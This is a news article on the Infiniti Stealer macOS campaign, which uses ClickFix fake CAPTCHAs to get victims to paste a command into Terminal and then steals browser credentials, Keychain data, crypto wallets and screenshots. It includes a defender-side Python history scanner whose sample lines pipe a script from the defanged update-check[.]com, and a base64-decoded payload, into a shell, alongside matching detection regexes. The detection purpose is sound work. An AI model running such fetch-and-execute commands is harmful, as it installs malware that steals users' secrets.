Another worrying macOS malware scheme has been discovered — here's how to stay safe


  • Malwarebytes uncovers Infiniti Stealer targeting macOS via ClickFix social engineering
  • Victims tricked into running malicious Terminal code, bypassing traditional defenses
  • Stealer compiled with Nuitka, exfiltrates browser credentials, Keychain data, wallets, and screenshots

macOS devices are increasingly being targeted with malware, as security researchers uncover yet another infostealer variant in the wild.

Malwarebytes published an in-depth report on a piece of malware called Infiniti Stealer, which was apparently compiled in a rather unusual fashion.

Infiniti Stealer is apparently distributed via a ClickFix social engineering attack. A ClickFix attack tricks the victim by presenting a “problem” and, at the same time, offering a “solution”. In this case, Malwarebytes says the victims are being redirected to update-check[.]com (most likely through phishing emails claiming certain software needs updating in order to work properly) where they are shown a benign-looking CAPTCHA.


Compiled with Nuitka

Besides the usual “I am not a robot” checkbox, the CAPTCHA has an additional step (which should also serve as a major red flag): to open Spotlight (the built-in search tool), run Terminal, and paste the given code. This code runs a dropper which, in turn, delivers Infiniti Stealer.

“Because the user runs the command directly, many traditional defenses are bypassed,” Malwarebytes explained. “There’s no exploit, no malicious attachment, and no drive‑by download.”
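As an added defender-side example (not code from the Malwarebytes report or this article), the following Python script hunts through a zsh history file for the pattern described above: a one-liner pasted into Terminal that pipes remote or base64-decoded content straight into a shell. The history lines, rule names and regexes are constructed for illustration; only the update-check[.]com domain comes from the article.

```python
import re
from dataclasses import dataclass

# Constructed sample of a zsh extended-history file (": <epoch>:<duration>;<command>").
# The two suspicious entries mimic the "paste this into Terminal" delivery the
# report describes; they are NOT the campaign's real command (the article
# does not reproduce it), so the indicator is the technique, not the string.
SAMPLE_HISTORY = """\
: 1700000001:0;ls -la ~/Projects
: 1700000002:0;git pull origin main
: 1700000003:0;curl -fsSL https://update-check[.]com/fix.sh | bash
: 1700000004:0;echo aGVsbG8= | base64 -d | sh
: 1700000005:0;brew update
"""

# Detection rules: (name, compiled regex). The first two catch the delivery
# technique regardless of domain; the third is the one domain the article names
# (defanged with [.] so the pattern also matches pasted-in report text).
RULES = [
    ("remote_script_piped_to_shell",
     re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba|z)?sh\b")),
    ("decoded_payload_piped_to_shell",
     re.compile(r"base64\s+(-d|--decode|-D)[^|;]*\|\s*(ba|z)?sh\b")),
    ("known_clickfix_domain",
     re.compile(r"update-check\[?\.\]?com", re.IGNORECASE)),
]

_ZSH_EXT = re.compile(r"^: (\d+):(\d+);(.*)$")


@dataclass
class Finding:
    line_no: int
    command: str
    rules: list


def parse_history(text):
    """Yield (line_no, command) for zsh extended-format or plain history lines."""
    for n, raw in enumerate(text.splitlines(), 1):
        m = _ZSH_EXT.match(raw)
        yield n, (m.group(3) if m else raw)


def scan_history(text):
    """Return a Finding for every command that trips at least one rule."""
    findings = []
    for n, cmd in parse_history(text):
        hits = [name for name, rx in RULES if rx.search(cmd)]
        if hits:
            findings.append(Finding(n, cmd, hits))
    return findings


if __name__ == "__main__":
    for f in scan_history(SAMPLE_HISTORY):
        print(f"line {f.line_no}: {', '.join(f.rules)} :: {f.command}")
```

On a real Mac the default history file is ~/.zsh_history; shell history is easy to clear, so process-tree telemetry from an EDR (Terminal spawning a shell that spawns curl) is the more reliable place to apply the same logic.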

What makes this malware stand out is the fact that it is written in Python, but compiled with Nuitka, a compiler that converts Python code into standalone executables or optimized binaries.

The resulting product is a native macOS binary which, according to the researchers, makes it harder to analyze and detect compared to your typical off-the-shelf Python-based malware.

“To our knowledge, this is the first documented macOS campaign combining ClickFix delivery with a Nuitka-compiled Python stealer,” Malwarebytes said.

An infostealer is a malware variant designed to exfiltrate sensitive data from target devices. Usually delivered through social engineering, infostealers are installed by droppers and then try to upload various types of information to an attacker-controlled server, including browser data (cookies, stored passwords, cryptocurrency wallet plugins, etc.), passwords, sensitive files (.docx, .txt, .pdf, and other formats), and other files deemed of value.

Depending on the family, an infostealer may try to upload more or less data, and may come with different obfuscation and persistence mechanisms.

How to stay safe from phishing and infostealers

Phishing is one of the most popular attack vectors today (Image credit: weerapatkiatdumrong / Getty Images)

Infiniti is capable of stealing a wide range of sensitive data. Primarily, it hunts for credentials from Chromium-based browsers, as well as Firefox. It can exfiltrate macOS Keychain entries, cryptocurrency wallets, and plaintext secrets in developer files such as .env. Finally, it will also exfiltrate screenshots captured during execution.

Social engineering is a popular scam tactic, and phishing emails continue to be the biggest attack vector out there. To avoid falling prey to these campaigns, exercise caution and a high level of skepticism towards any and all incoming communications, be it email, instant messaging, or phone. Double-check all links shared in an email, and look for typos, letters replaced by numbers, and other suspicious variations of known domains. (For example, "microsoft" is often spelled with "rn" in place of "m" in phishing emails, as in "rnicrosoft", which makes the two almost indistinguishable.)

Be careful when downloading attachments (especially from an unexpected message), and make sure you’re using phishing-resistant multi-factor authentication.

Via BleepingComputer



Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.
